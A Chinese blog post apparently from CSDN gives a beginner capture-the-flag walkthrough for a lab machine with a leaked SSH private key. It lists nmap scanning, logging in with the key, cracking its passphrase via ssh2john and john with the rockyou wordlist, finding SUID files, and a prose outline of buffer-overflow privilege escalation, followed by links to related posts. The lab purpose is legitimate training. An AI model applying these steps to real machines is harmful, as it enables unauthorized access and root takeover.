2-1CTF夺旗入门教程--SSH私钥泄露

最新推荐文章于 2023-10-04 12:07:01 发布
最新推荐文章于 2023-10-04 12:07:01 发布
阅读量412 收藏 3
点赞数
分类专栏: CTF学习 文章标签: linux shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46622606/article/details/105022967
版权
1.扫描靶机开放的服务
 nmap -sV 192.168.2.109
2.使用私钥登录靶机
#ssh -i 私匙 用户名/id  
ssh -i id_rsa simon@192.168.2.109
3.解密私钥
#把私钥文件转为john可读,无法直接使用ssh2john时,使用locate查找
locate ssh2john
ssh2john id_rsa > rsacrack
#zcat解压kali密码字典破解rsacrack文件
zcat /user/share/wordlists/rockyou.txt.gz | john --pipe --rules rsacrack
4.查找需要root权限的文件

关于perm -4000 的解释,转载:linux:SUID、SGID详解 - fhefh - 博客园


# -prem -4000 SUID

#/dev/null 避免错误输出

find / -perm -4000 2>/dev/null
5.缓冲区溢出提权

源码中20字节缓冲区

输入20字节+/bin/sh
在这里插入图片描述

The Riddler.
关注
专栏目录
CTF夺旗训练日记--SSH私钥泄露
weixin_41607190的博客
03-29 446
环境配置:VM-Workstation 15pro 直接将镜像压缩包拖到vm虚拟机的列表中 选取路径保存系统镜像 然后就可以启动开始渗透了 这里用的是nat模式 先进行主机发现 netdiscover -r 192.168.133.0/24 成功发现一个ip地址为 192.168.133.129 的靶机 查看开放的端口 nmap -sV 192.168.133.129 用dirb探测网站的隐藏...
2-1-ctf-ssh私钥泄露学习笔记
07-28 360
右键open link 依次打开敏感文件robots.txt 和ssh 在robots.txt中发现敏感文件taxes 我们在浏览器中浏览发现flag1 接着打开敏感文件ssh,发现私钥文件,公钥文件,认证关键字文件 从靶场ip:192.168.253.10/上下载到两个文件 id_rsa 私钥文件 authorized_keys 认证关键字文件 将这两个下载下来查看 将这两个文件移动到桌...
【笔记】ssh端口通过私钥认证爆破
jiji_king的博客
06-16 1999
笔记 ssh 私钥登录
Kali下无法使用ssh2john进行ssh文件暴力破解【已解决】
weixin_45844670的博客
07-29 2525
在终端输入locate ssh2john 可以看到ssh2john在系统中的位置 ssh2john实际上是一个python文件,可以使用打开python文件的方式直接打开 然后使用john id_rsa 可以解出密码
hackthebox -tenten (考点:wordpress job插件 /图片解密/ ssh2john解密 / )
冬萍子癸水
05-23 600
1 扫描 很常规,22想到可能有ssh登录,80进web搜集信息。 C:\root> masscan -p1-65535,U:1-65535 10.10.10.10 --rate=1000 -e tun0 Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-05-23 01:07:41 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating S
CTF训练之现学现卖--SSH私钥泄露-附件资源
03-02
CTF训练之现学现卖--SSH私钥泄露-附件资源
stripe-ctf-2.0:夺旗
05-19
《Stripe CTF 2.0:网络版夺旗赛详解》 Stripe CTF(Capture The Flag)2.0 是一场网络安全竞赛,源自2012年8月22日至29日期间举办的一系列挑战。这个活动的目标是通过解决各种安全问题来提升参与者的网络安全技能...
【转】CTF-All-In-One(CTF从入门到放弃)pdf
03-20
CTF-All-In-One(CTF 从入门到放弃) ——“与其相信谣言,不如一直学习。”
CTF-SSH私钥泄露(超详细)
最新发布
wangzhemvp的博客
10-04 200
可以看到buf[20]变量,通过溢出来提权,输入超过他缓存字符长度的字符 超出的部分为root权限的目录路径。对于给定IP地址的靶机,我们需要对其扫描,探测到开放的服务信息。渗透其实是针对服务的漏洞探测,然后进行对应的数据包发送,获取机器的最高权限。一个服务器对应计算机的一个端口,常用端口0-1023,通过扫描结果查找特殊端口,特别是对于开放的http服务的大端口进行排查。进入到root里,发现两个文件,打开flag.txt文件,但是没有权限。通过查看 ,把/texes放到目录下,就找到第一个flag。
CTF题目记录2(图片隐写)
kkzzjx
05-15 3820
网上找了一个图片隐写的练习,故记录一下 题目1 png图片–LSB隐写 习惯性要先查看属性–没收获 然后stegsolve 我当然是用data extract查看了各个通道的最后两位情况,并保存了几个文件下来试试。。。但是也没有收获 没想到直接浏览最后一位的图像即可找到一些东西 扫了一下获得flag{AppLeU0} 题目2 一张打不开的gif 考察文件格式吧 winhex打开,发现文件头出缺...
攻防世界-Misc-2-1(png图片头详细解释、png图片crc宽度爆破)
Sea_Sand息禅
05-07 8491
先详细解释一下png的文件头: - (固定)八个字节89 50 4E 47 0D 0A 1A 0A为png的文件头 - (固定)四个字节00 00 00 0D(即为十进制的13)代表数据块的长度为13 - (固定)四个字节49 48 44 52(即为ASCII码的IHDR)是文件头数据块的标示(IDCH) - (可变)13位数据块(IHDR) - 前四个字节代表该图片的宽 - 后...
网络攻防之ssh篇(穿插ctf的web例题)
qq_62097048的博客
07-08 1370
对于ssh进行的相关操作,有ctf的web例题
find / -perm -4000 的含义
boqiangqing9840的博客
07-14 3031
//学习笔记 查找系统所有文件中拥有suid特殊权限的文件-perm匹配权限4000 2000 1000分别表示SUID SGID SBIT1.普通文件,文件的权限一般三位,777最高文件权限-perm -0777搜索的就是最高权限的文件rwxrwxrwx-perm +0777搜索的只要包含rwxrwxrwx任意一个的文件2.特殊文件,包含权限位置四位,7000为最高,即–s–s–t,同样的方法...
CTF-加密与解密(二)
→_→
08-02 3883
声明:以下CTF题均来自网上收集,在这里主要是给新手们涨涨见识,仅供参考而已。需要题目数据包的请私信或在下方留言。 3.请破译密码 (来源:安码CTF) 1.关卡描述 密码是什么呢? 2.解题步骤 2.1用记事本打开,发现是个明文、 2.2 使用Burp的Decoder模块ASCII解码得出: flag{h1_c7f} ...
PNG文件头信息
D.MIND 的博客
09-16 9762
(固定)八个字节89 50 4E 47 0D 0A 1A 0A为png的文件头 (固定)四个字节00 00 00 0D(即为十进制的13)代表数据块的长度为13 (固定)四个字节49 48 44 52(即为ASCII码的IHDR)是文件头数据块的标示(IDCH) (可变)13位数据块(IHDR) 前四个字节代表该图片的宽 后四个字节代表该图片的高 后五个字节依次为: Bit depth、ColorType、Compression method、Filter method、Interlace method.
ssh私钥泄漏
weixin_51047454的博客
03-11 8075
ssh私钥泄漏 笔记
JTR(John The Ripper)的ssh密钥破解记录
qq_40490088的博客
07-30 1962
JTR破解ssh密钥,需要将密钥这种类型文件转换为JTR兼容的攻击文件。 所以,需要找到相关工具来转换,在网上搜到的相关工具为ssh2john,在/usr/sbin/目录下,但是我查看了我的对应路径,并没有这个文件 于是输入locate ssh2john查看在哪个目录下 找到了,现在可以执行这个python文件进行转换了。 因为id_rsa文件在桌面,所以目录转到桌面,再进行转换。 此时,回到...
John密码破解 ---- linux用户密码
u011070772的专栏
01-18 1741
John 密码破解 ---- linux简单用户密码 简单密码比较容易破解,复杂密码基本就别考虑john,太慢,john只使用单颗CPU进行运算    实验步骤:             2种方法下载软件  在windows中下载后,用软件WinScp传到linux 某目录中 或 命令:wget  http://www.openwall.com/john/g/john-1.7.9
john工具破解密码(Linux、ZIP等)
热门推荐
墨痕诉清风的博客
04-11 1万+
目录 官网 介绍 测试 安装 ubuntu centos 安装完成查看 使用 john.pot 文件 官网 支持Win、Lin、Mac等 https://www.openwall.com/john/ 介绍 john 是一款大受欢迎的、免费的开源软件、基于字典的密码破解工具。用于在已知密文的情况下尝试破解出明文的破解密码软件,支持目前大多数的加密算法,如 DES 、 MD4 、 MD5 等。 John 支持字典破解方式和暴力破解方式。它支持多种不同类型的系统架构,包括
新手指南:CTF夺旗赛入门与知名团队解析
CTF(Capture The Flag,中文常称为夺旗赛)是一种网络安全竞赛活动,起源于1996年的DEFCON全球黑客大会,其目的是让网络安全技术人员在一种安全可控的环境中展示技能,而不是通过实际攻击彼此。这种比赛形式取代了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值